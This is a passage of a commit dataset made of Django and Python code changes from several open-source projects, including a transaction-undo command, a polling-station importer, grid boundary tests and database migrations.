entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
                except Journal.DoesNotExist:
                    print('Invalid transaction')
                    continue
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
Add management command to undo transactions.
|
Add management command to undo transactions.
|
Python
|
mit
|
TkkrLab/barsystem,TkkrLab/barsystem,TkkrLab/barsystem
|
Add management command to undo transactions.
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
                except Journal.DoesNotExist:
                    print('Invalid transaction')
                    continue
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
<commit_before><commit_msg>Add management command to undo transactions.<commit_after>
|
from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
                except Journal.DoesNotExist:
                    print('Invalid transaction')
                    continue
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
Add management command to undo transactions.from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
                except Journal.DoesNotExist:
                    print('Invalid transaction')
                    continue
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
<commit_before><commit_msg>Add management command to undo transactions.<commit_after>from django.core.management.base import BaseCommand
from barsystem_base.models import Person, Journal
class Command(BaseCommand):
def handle(self, *args, **kwargs):
while True:
try:
person_id = input('Enter user ID (or enter to exit): ')
except EOFError:
return
if len(person_id) == 0:
return
try:
person = Person.objects.get(id=person_id)
except Person.DoesNotExist:
print('Invalid id')
continue
print(person.nick_name)
while True:
entries = Journal.objects.filter(recipient=person).order_by('-moment')[0:10]
for entry in entries:
print('[{}] {}'.format(entry.id, entry.product.name))
try:
transaction_id = input('Enter transaction ID: ')
except EOFError:
break
if len(transaction_id) == 0:
break
try:
entry = Journal.objects.get(recipient=person, id=transaction_id)
                except Journal.DoesNotExist:
                    print('Invalid transaction')
                    continue
print('Transaction: {} {} {} {}'.format(entry.moment, entry.items, entry.amount, entry.product.name))
confirm = input('Delete this transaction? [y/N] ')
if confirm == 'y':
total = entry.items * entry.amount
entry.delete()
person.amount += total
person.save()
print('Transaction undone.')
|
|
d468d6a24eb7573163911eee8094c5cc47d1a08f
|
polling_stations/apps/data_collection/management/commands/import_south_cambridge.py
|
polling_stations/apps/data_collection/management/commands/import_south_cambridge.py
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
Add importer for South Cambridgeshire.
|
Add importer for South Cambridgeshire.
refs #82
|
Python
|
bsd-3-clause
|
chris48s/UK-Polling-Stations,andylolz/UK-Polling-Stations,andylolz/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,andylolz/UK-Polling-Stations
|
Add importer for South Cambridgeshire.
refs #82
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
<commit_before><commit_msg>Add importer for South Cambridgeshire.
refs #82<commit_after>
|
"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
Add importer for South Cambridgeshire.
refs #82"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
<commit_before><commit_msg>Add importer for South Cambridgeshire.
refs #82<commit_after>"""
Import South Cambridge
"""
import sys
from data_collection.management.commands import BaseShpShpImporter
class Command(BaseShpShpImporter):
"""
Imports the Polling Station data from South Cambridge
"""
srid = 4326
council_id = 'E07000012'
districts_name = 'Polling Districts for Twitter_region'
stations_name = 'Polling Stations for Twitter_point.shp'
def district_record_to_dict(self, record):
return {
'internal_council_id': record[1],
'name': record[0],
}
def station_record_to_dict(self, record):
return {
'internal_council_id': record[0],
'postcode' : self.postcode_from_address(record[0]),
'address' : self.string_to_newline_addr(record[0])
}
|
|
20d50e4b5a3500865d97f12f2c48c72f558d170d
|
landlab/grid/tests/test_raster_grid/test_BC_updates.py
|
landlab/grid/tests/test_raster_grid/test_BC_updates.py
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
Add tests for BC changes
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.
|
Python
|
mit
|
Carralex/landlab,RondaStrauch/landlab,ManuSchmi88/landlab,RondaStrauch/landlab,amandersillinois/landlab,ManuSchmi88/landlab,SiccarPoint/landlab,cmshobe/landlab,laijingtao/landlab,amandersillinois/landlab,RondaStrauch/landlab,Carralex/landlab,cmshobe/landlab,landlab/landlab,csherwood-usgs/landlab,landlab/landlab,Carralex/landlab,ManuSchmi88/landlab,laijingtao/landlab,SiccarPoint/landlab,landlab/landlab,csherwood-usgs/landlab,cmshobe/landlab
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
<commit_before><commit_msg>Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.<commit_after>
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
<commit_before><commit_msg>Add tests for BC changes
Some elementary tests for BC changes on a raster. Tests would be
equivalent on an irregular grid.<commit_after>import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import with_setup, assert_true, assert_equal, assert_not_equal
from landlab import FIXED_GRADIENT_BOUNDARY, CLOSED_BOUNDARY, INACTIVE_LINK, \
FIXED_LINK
from landlab import RasterModelGrid
def setup_grid():
globals().update({
'rmg': RasterModelGrid((4, 5))
})
@with_setup(setup_grid)
def test_link_update_with_nodes_closed():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
inactive_array = np.array([INACTIVE_LINK, ] * 5)
assert_array_equal(rmg.status_at_link[4:9], inactive_array)
@with_setup(setup_grid)
def test_link_update_with_nodes_fixed_grad():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = FIXED_GRADIENT_BOUNDARY
fixed_array = np.array([FIXED_LINK, ] * 3)
assert_array_equal(rmg.status_at_link[5:8], fixed_array)
@with_setup(setup_grid)
def test_BC_set_code_init():
assert_equal(rmg.BC_set_code, 0.)
@with_setup(setup_grid)
def test_BC_set_code_change():
rmg.status_at_node[rmg.nodes_at_bottom_edge] = CLOSED_BOUNDARY
assert_not_equal(rmg.BC_set_code, 0.)
|
|
54368e90a67c73450bb10607f9566b88db1d97f4
|
migrations/versions/740_migrate_supplier_frameworks_to_.py
|
migrations/versions/740_migrate_supplier_frameworks_to_.py
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
Migrate framework agreements to `framework_agreements`
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
<commit_before><commit_msg>Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.<commit_after>
|
"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not."""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
<commit_before><commit_msg>Migrate framework agreements to `framework_agreements`
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
Note, we are moving framework agreements regardless of if they have a framework
agreement version or not.<commit_after>"""migrate supplier_frameworks to framework_agreements
Revision ID: 740
Revises: 730
Create Date: 2016-09-14 14:23:56.196966
For supplier_framework rows that contain details of returning a framework agreement (indicated
by non null `agreement_details` or `agreement_returned_at`) and do not yet have a
corresponding row in the `framework_agreements` table.
"""
# revision identifiers, used by Alembic.
revision = '740'
down_revision = '730'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("""
INSERT INTO framework_agreements(supplier_id, framework_id, signed_agreement_details, signed_agreement_returned_at)
(SELECT sf.supplier_id, sf.framework_id, sf.agreement_details, sf.agreement_returned_at
FROM supplier_frameworks sf
LEFT JOIN framework_agreements fa
ON sf.supplier_id = fa.supplier_id
AND sf.framework_id = fa.framework_id
WHERE fa.id IS NULL
-- We need to convert JSON to text as JSON null is not the same as SQL null
AND (sf.agreement_details::text != 'null' OR sf.agreement_returned_at IS NOT NULL)
);
""")
def downgrade():
# No downgrade possible
pass
|
|
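The SQL comment in this migration is the crux: in PostgreSQL, JSON null is a JSON value, not SQL NULL, so a plain IS NOT NULL test would not exclude it. A minimal probe of that distinction; this is a sketch, not part of the commit, and the connection string is hypothetical:

# Hypothetical psycopg2 probe of JSON null vs SQL NULL in PostgreSQL.
import psycopg2

conn = psycopg2.connect('dbname=example')  # hypothetical DSN
cur = conn.cursor()
cur.execute("SELECT NULL::json IS NULL, 'null'::json IS NULL, 'null'::json::text")
print(cur.fetchone())  # expected: (True, False, 'null')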
068a066e0bc89fb1476db5d24ceeb6b6b57f78a0
|
mysite/engage/migrations/0002_auto_20141218_0750.py
|
mysite/engage/migrations/0002_auto_20141218_0750.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
Add example features and permissions
|
Add example features and permissions
|
Python
|
bsd-3-clause
|
Kvoti/ditto,Kvoti/ditto,Kvoti/ditto,Kvoti/ditto,Kvoti/ditto
|
Add example features and permissions
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
<commit_before><commit_msg>Add example features and permissions<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
Add example features and permissions# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
<commit_before><commit_msg>Add example features and permissions<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
|
6b0f2e47ee249e9923539b07ca31629b11ce5d73
|
studygroups/migrations/0094_update_venue_website.py
|
studygroups/migrations/0094_update_venue_website.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
Add migration to fix URLs for studygroup venue websites
|
Add migration to fix URLs for studygroup venue websites
|
Python
|
mit
|
p2pu/learning-circles,p2pu/learning-circles,p2pu/learning-circles,p2pu/learning-circles
|
Add migration to fix URLs for studygroup venue websites
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
<commit_before><commit_msg>Add migration to fix URLs for studygroup venue websites<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
Add migration to fix URLs for studygroup venue websites# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
<commit_before><commit_msg>Add migration to fix URLs for studygroup venue websites<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
|
9ba8756648a1c9ab322f417e9d2ab1aa75d0a2ea
|
reg/migrations/0006_auto_20151023_1826.py
|
reg/migrations/0006_auto_20151023_1826.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
Make migrations for leader_email field of Team model
|
Make migrations for leader_email field of Team model
|
Python
|
